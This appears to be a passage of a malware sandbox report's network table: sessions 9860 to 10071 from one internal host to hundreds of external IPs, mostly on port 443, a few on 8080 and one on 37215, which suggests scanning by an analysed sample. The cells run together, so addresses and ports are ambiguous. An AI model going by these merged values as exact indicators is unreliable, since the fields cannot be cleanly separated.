                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9860192.168.2.1355268212.74.125.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9861192.168.2.1356066199.234.181.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9862192.168.2.1358440220.198.111.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9863192.168.2.1344430132.219.250.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9864192.168.2.134728837.167.92.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9865192.168.2.1357574187.171.196.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9866192.168.2.1334770212.242.236.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9867192.168.2.1339152196.8.83.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9868192.168.2.1341238176.167.47.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9869192.168.2.134517836.107.168.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9870192.168.2.133964860.43.35.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9871192.168.2.13473805.228.73.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9872192.168.2.1342186178.215.134.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9873192.168.2.1345788223.217.8.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9874192.168.2.1341962156.79.40.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9875192.168.2.133591650.172.232.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9876192.168.2.1344878212.232.229.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9877192.168.2.1352484135.200.208.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9878192.168.2.1334256223.13.6.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9879192.168.2.1342376122.174.123.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9880192.168.2.135568427.113.101.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9881192.168.2.133343496.146.35.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9882192.168.2.133784840.82.25.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9883192.168.2.134946243.200.136.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9884192.168.2.1337226174.13.29.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9885192.168.2.134123286.171.12.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9886192.168.2.1334850216.226.34.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9887192.168.2.1343640131.82.27.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9888192.168.2.1339420208.74.49.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9889192.168.2.1356988134.16.58.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9890192.168.2.134843251.127.98.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9891192.168.2.1346422205.29.123.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9892192.168.2.1353792212.45.39.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9893192.168.2.1347744109.132.199.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9894192.168.2.133818670.230.20.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9895192.168.2.1352930167.175.227.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9896192.168.2.136038840.125.82.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9897192.168.2.135948249.205.86.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9898192.168.2.1359736185.15.114.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9899192.168.2.1358754103.125.228.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9900192.168.2.1350322179.47.249.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9901192.168.2.1341424104.13.250.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9902192.168.2.135237487.105.163.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9903192.168.2.134045280.76.98.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9904192.168.2.1352174152.96.15.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9905192.168.2.1353386111.132.41.268080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9906192.168.2.1353384111.132.41.268080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9907192.168.2.1353390111.132.41.268080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9908192.168.2.1343962197.148.89.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9909192.168.2.133469883.81.127.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9910192.168.2.13568645.208.241.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9911192.168.2.1357262155.99.123.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9912192.168.2.1359860221.161.56.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9913192.168.2.1354634117.238.46.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9914192.168.2.1345208154.219.42.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9915192.168.2.1355002149.154.26.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9916192.168.2.135600491.113.232.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9917192.168.2.1358878211.248.12.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9918192.168.2.135133871.238.133.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9919192.168.2.1357030179.58.127.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9920192.168.2.1346772155.240.253.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9921192.168.2.1354022209.56.59.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9922192.168.2.1349130192.48.155.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9923192.168.2.1339846125.78.200.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9924192.168.2.136011499.192.72.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9925192.168.2.1344710203.173.150.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9926192.168.2.135027032.78.201.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9927192.168.2.13587205.243.37.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9928192.168.2.1355550131.136.88.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9929192.168.2.1345272194.14.155.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9930192.168.2.134376814.191.203.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9931192.168.2.134997484.117.167.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9932192.168.2.133280435.33.50.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9933192.168.2.1347918167.238.85.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9934192.168.2.1350326128.108.121.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9935192.168.2.1348066106.202.23.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9936192.168.2.1343898219.207.182.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9937192.168.2.1357074167.84.111.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9938192.168.2.1360640158.100.25.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9939192.168.2.1354852150.49.113.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9940192.168.2.135673241.61.130.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9941192.168.2.1346526119.105.0.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9942192.168.2.1339258130.198.66.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9943192.168.2.135468223.203.231.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9944192.168.2.1347574126.58.176.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9945192.168.2.135953048.166.116.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9946192.168.2.134434420.69.93.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9947192.168.2.134324699.103.81.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9948192.168.2.1333672104.10.36.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9949192.168.2.1334190169.87.88.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9950192.168.2.135930092.155.63.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9951192.168.2.133936486.214.243.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9952192.168.2.1351180195.186.161.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9953192.168.2.1336450133.46.85.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9954192.168.2.1354502219.249.35.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9955192.168.2.1343624221.163.22.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9956192.168.2.135784897.153.53.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9957192.168.2.1349928213.36.157.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9958192.168.2.1349884131.17.124.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9959192.168.2.1341614164.174.161.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9960192.168.2.134565618.101.191.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9961192.168.2.1333918154.230.66.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9962192.168.2.134017661.176.217.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9963192.168.2.1334082112.61.146.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9964192.168.2.1345996217.166.64.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9965192.168.2.1334460160.233.1.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9966192.168.2.135534627.242.164.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9967192.168.2.134931038.111.117.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9968192.168.2.1354088174.4.209.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9969192.168.2.134795012.111.119.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9970192.168.2.1348976119.1.27.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9971192.168.2.1353360195.120.133.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9972192.168.2.1356646220.101.15.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9973192.168.2.1352496210.135.216.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9974192.168.2.1349388188.206.11.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9975192.168.2.1354880135.77.51.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9976192.168.2.133909859.183.4.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9977192.168.2.1347204123.51.98.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9978192.168.2.135406060.133.131.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9979192.168.2.135036892.162.105.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9980192.168.2.1353348196.130.31.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9981192.168.2.1341740124.28.21.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9982192.168.2.1357410199.8.204.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9983192.168.2.1359322212.3.39.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9984192.168.2.136037493.250.39.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9985192.168.2.1349824142.213.166.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9986192.168.2.135153089.92.210.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9987192.168.2.1345396116.245.238.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9988192.168.2.134838678.103.47.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9989192.168.2.1341660200.135.105.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9990192.168.2.135804619.37.136.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9991192.168.2.1352680205.46.136.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9992192.168.2.135896852.45.116.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9993192.168.2.134967443.75.84.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9994192.168.2.1350780111.112.167.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9995192.168.2.1339094213.127.88.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9996192.168.2.1352426131.172.33.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9997192.168.2.134109673.128.231.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9998192.168.2.134895894.235.9.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9999192.168.2.135125074.131.221.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10000192.168.2.1338560113.118.4.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10001192.168.2.1342886169.105.59.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10002192.168.2.1349408124.212.156.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10003192.168.2.1356142104.156.168.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10004192.168.2.133907224.168.103.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10005192.168.2.1335156172.45.51.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10006192.168.2.1337718166.43.5.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10007192.168.2.1340798189.73.174.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10008192.168.2.135173097.203.19.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10009192.168.2.1342044151.104.181.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10010192.168.2.1359326174.193.210.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10011192.168.2.1358874109.155.161.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10012192.168.2.1359848139.211.44.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10013192.168.2.134874882.150.179.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10014192.168.2.1358808201.65.107.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10015192.168.2.1358610217.87.97.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10016192.168.2.1360978115.166.129.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10017192.168.2.134361043.190.244.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10018192.168.2.133914265.79.124.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10019192.168.2.1354664156.40.45.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10020192.168.2.134265243.75.212.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10021192.168.2.1352816175.152.91.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10022192.168.2.1357880109.240.118.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10023192.168.2.1333976216.188.45.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10024192.168.2.134436044.34.227.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10025192.168.2.134012085.118.182.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10026192.168.2.1334926195.79.215.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10027192.168.2.1336062161.158.80.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10028192.168.2.1357872113.72.105.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10029192.168.2.1335194164.173.200.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10030192.168.2.1342196173.183.94.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10031192.168.2.1353216101.186.247.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10032192.168.2.1354814199.7.89.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10033192.168.2.1353572126.179.210.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10034192.168.2.1347178198.171.168.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10035192.168.2.1359588160.77.254.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10036192.168.2.1348928138.109.137.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10037192.168.2.1346102141.123.160.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10038192.168.2.133727439.199.54.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10039192.168.2.1354332203.21.55.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10040192.168.2.1344198180.16.250.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10041192.168.2.1350284172.187.66.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10042192.168.2.1348354151.78.8.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10043192.168.2.1337740159.25.128.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10044192.168.2.1357862148.145.183.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10045192.168.2.133371481.243.89.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10046192.168.2.1343410197.9.224.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10047192.168.2.13468561.214.27.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10048192.168.2.1347146217.205.33.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10049192.168.2.13374145.87.23.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10050192.168.2.135381862.1.242.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10051192.168.2.134410878.16.151.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10052192.168.2.1334278129.134.220.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10053192.168.2.1355584168.50.142.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10054192.168.2.1356526197.62.71.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10055192.168.2.1339572134.4.208.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10056192.168.2.1352574108.25.227.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10057192.168.2.1354142144.62.233.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10058192.168.2.1345976199.189.65.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10059192.168.2.133825870.75.220.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10060192.168.2.1340130203.35.248.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10061192.168.2.135514214.111.22.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10062192.168.2.13348041.123.60.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10063192.168.2.135327214.107.20.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10064192.168.2.135392817.210.102.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10065192.168.2.1357952222.77.186.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10066192.168.2.1335854205.132.89.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10067192.168.2.135524899.172.132.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10068192.168.2.1353816146.230.107.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10069192.168.2.1333346168.248.117.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10070192.168.2.1340688109.21.156.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10071192.168.2.1347758149.181.220.124443
